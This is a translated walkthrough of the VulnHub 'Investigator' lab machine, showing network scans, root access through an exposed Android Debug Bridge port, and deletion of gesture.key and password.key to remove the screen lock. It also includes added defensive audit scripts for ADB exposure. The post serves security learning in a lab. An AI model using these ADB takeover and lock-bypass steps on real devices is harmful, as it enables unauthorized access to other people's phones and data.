Vulnhub Investigator machine: testing process

Published: 2023-04-15 18:14:10  Author: Jason_huawen

Investigator

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:c8:78:7a      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.254  08:00:27:20:60:06      1      60  PCS Systemtechnik GmbH            

Using the netdiscover tool in Kali Linux, the target host's IP address is identified as 192.168.56.254.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 05:21 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.000077s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
5555/tcp  open  adb     Android Debug Bridge device (name: android_x86; model: VirtualBox; device: x86)
8080/tcp  open  http    PHP cli server 5.5 or later
|_http-title: Welcome To  UnderGround Sector
|_http-open-proxy: Proxy might be redirecting requests
22000/tcp open  ssh     Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey: 
|   1024 b3986598fdc064fe16d63036aa2bef6b (DSA)
|   2048 19e29e6cc68daf4e867c3b609133e185 (RSA)
|_  521 46134349248806856c759373b51d8f28 (ECDSA)
MAC Address: 08:00:27:20:60:06 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Android, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds

The NMAP scan results show that the target host has three open ports: 5555 (adb), 8080 (http) and 22000 (ssh).
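As an added example that is not part of the original write-up, the following POSIX shell audit reads an Nmap report saved with -oN (the format above) and flags the exposures a defender cares about on this target: ADB reachable over the network, a PHP development server on a public port and a Dropbear release older than a policy year. The severity labels and the MIN_SSH_YEAR threshold are assumptions of this example, not Nmap output.

```shell
# Print one finding per risky open port in an Nmap normal-output (-oN) report.
# Open-port lines look like: "<port>/<proto>  open  <service> <version...>".
MIN_SSH_YEAR=${MIN_SSH_YEAR:-2019}   # local policy threshold (assumption of this example)
nmap_risky_ports() {
    grep -E '^[0-9]+/(tcp|udp) +open ' "$1" | while read -r portproto state service version; do
        port=${portproto%%/*}
        case "$service" in
            adb)
                echo "HIGH port $port: Android Debug Bridge exposed to the network; any client that can connect gets a device shell" ;;
            ssh)
                case "$version" in
                    "Dropbear sshd "[0-9][0-9][0-9][0-9].*)
                        # Dropbear versions are YEAR.NN, so the year is the release date
                        year=${version#"Dropbear sshd "}; year=${year%%.*}
                        if [ "$year" -lt "$MIN_SSH_YEAR" ]; then
                            echo "MEDIUM port $port: Dropbear release year $year is older than policy minimum $MIN_SSH_YEAR ($version)"
                        fi ;;
                esac ;;
            http)
                case "$version" in
                    "PHP cli server"*) echo "LOW port $port: PHP built-in development server is serving network traffic ($version)" ;;
                esac ;;
        esac
    done
}

# Returns 0 when the report raised no finding, 1 otherwise.
nmap_is_clean() {
    [ "$(nmap_risky_ports "$1" | wc -l | tr -d ' ')" -eq 0 ]
}

# Sample report: the open-port lines from the scan above, as written by -oN.
sample_report=$(mktemp)
cat > "$sample_report" <<'EOF'
PORT      STATE SERVICE VERSION
5555/tcp  open  adb     Android Debug Bridge device (name: android_x86; model: VirtualBox; device: x86)
8080/tcp  open  http    PHP cli server 5.5 or later
22000/tcp open  ssh     Dropbear sshd 2014.66 (protocol 2.0)
EOF
nmap_risky_ports "$sample_report"
```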

Getting a shell

This is a system that emulates an Android phone.

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ nikto -h http://192.168.56.254:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        8080
+ Start Time:         2023-04-15 05:25:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF:  Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-04-15 05:26:08 (GMT-4) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Analysis with the adb tool

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ sudo apt install -y adb

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb  connect 192.168.56.254
connected to 192.168.56.254:5555
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb devices -l             
List of devices attached
192.168.56.254:5555    device product:android_x86 model:VirtualBox device:x86 transport_id:1

Then get a shell on the target Android system

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb -s 192.168.56.254 shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ # id
uid=0(root) gid=0(root)
uid=0(root) gid=0(root)@x86:/ # cd /root
sh: cd: /root: No such file or directory
2|uid=0(root) gid=0(root)@x86:/ # ls
acct
cache
config
d
data
default.prop
dev
etc
file_contexts
init
init.bluetooth.rc
init.environ.rc
init.rc
init.superuser.rc
init.trace.rc
init.usb.rc
init.x86.rc
lib
mnt
proc
property_contexts
sbin
sdcard
seapp_contexts
sepolicy
storage
sys
system
ueventd.android_x86.rc
ueventd.rc
vendor
x86.prop
uid=0(root) gid=0(root)@x86:/ # cd data
uid=0(root) gid=0(root)@x86:/data # ls
anr
app
app-asec
app-lib
app-private
backup
bugreports
dalvik-cache
data
dontpanic
drm
local
lost+found
media
mediadrm
misc
property
resource-cache
root
security
ssh
system
tombstones
user
uid=0(root) gid=0(root)@x86:/data # cd root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
Great Move !!! 

Itz a easy one right ???

lets make this one lil hard


You flag is not here  !!!     


Agent "S"   Your Secret Key ---------------->259148637uid=0(root) gid=0(root)@x86:/data/root # 

Surprisingly, we can switch to root directly without a password. Although we obtained the flag.txt file, it says "Your flag is not here".
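The password-less su above is the symptom; what a device owner should audit are the adbd and build properties that decide who gets a shell and as which user. The following added example (not from the original post) parses a saved `adb shell getprop` dump and reports weak ADB/root settings; both dumps are constructed for illustration, not captured from this target, and the findings text is this example's own.

```shell
# Return the value of one property from a saved `adb shell getprop` dump.
prop_value() {
    # getprop prints "[key]: [value]"; escape dots so they match literally in sed
    key=$(printf '%s' "$2" | sed 's/\./\\./g')
    sed -n "s/^\[$key\]: \[\([^]]*\)\]/\1/p" "$1" | head -n 1
}

# Audit the ADB / root exposure of a device from its getprop dump.
# Prints one line per weak setting and returns 1 if any was found, 0 if clean.
audit_adb_props() {
    dump="$1"
    findings=0
    tcp_port=$(prop_value "$dump" service.adb.tcp.port)
    if [ -z "$tcp_port" ]; then tcp_port=$(prop_value "$dump" persist.adb.tcp.port); fi
    if [ -n "$tcp_port" ] && [ "$tcp_port" != "-1" ]; then   # -1 means USB only
        echo "adbd listens on TCP port $tcp_port: any host that can reach it gets a shell"
        findings=$((findings + 1))
    fi
    if [ "$(prop_value "$dump" ro.adb.secure)" != "1" ]; then
        echo "ro.adb.secure is not 1: ADB clients are not RSA-authenticated"
        findings=$((findings + 1))
    fi
    if [ "$(prop_value "$dump" ro.secure)" = "0" ]; then
        echo "ro.secure=0: adbd starts as root, so every ADB shell is already uid 0"
        findings=$((findings + 1))
    fi
    if [ "$(prop_value "$dump" ro.debuggable)" = "1" ]; then
        echo "ro.debuggable=1: debuggable build, 'adb root' and app debugging are allowed"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# Constructed sample dumps: the first shows the kind of settings behind an
# exposure like this machine's, the second a production-like configuration.
weak_dump=$(mktemp); hardened_dump=$(mktemp)
cat > "$weak_dump" <<'EOF'
[ro.adb.secure]: [0]
[ro.debuggable]: [1]
[ro.secure]: [0]
[service.adb.tcp.port]: [5555]
EOF
cat > "$hardened_dump" <<'EOF'
[ro.adb.secure]: [1]
[ro.debuggable]: [0]
[ro.secure]: [1]
EOF
if audit_adb_props "$weak_dump"; then echo "unexpected: weak dump passed"; fi
```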

Next, delete the key files from the system directory to disable the screen-lock protection.

uid=0(root) gid=0(root)@x86:/data/system # ls *.key
gesture.key
password.key
uid=0(root) gid=0(root)@x86:/data/system # rm -rf *.key

Then reboot the virtual machine (that is, the target Android system); the lock screen is gone.

When we try to open the Messaging app, we find it is locked by App Lock, so that app needs to be uninstalled first.

┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb -s 192.168.56.254 shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su - 
root@x86:/ # adb uninstall com.martianmode.applock
* daemon not running. starting it now on port 5038 *
* daemon started successfully *
- waiting for device -

When trying to uninstall App Lock, the process stopped responding. I am not sure whether this is because I changed the network mode to host-only.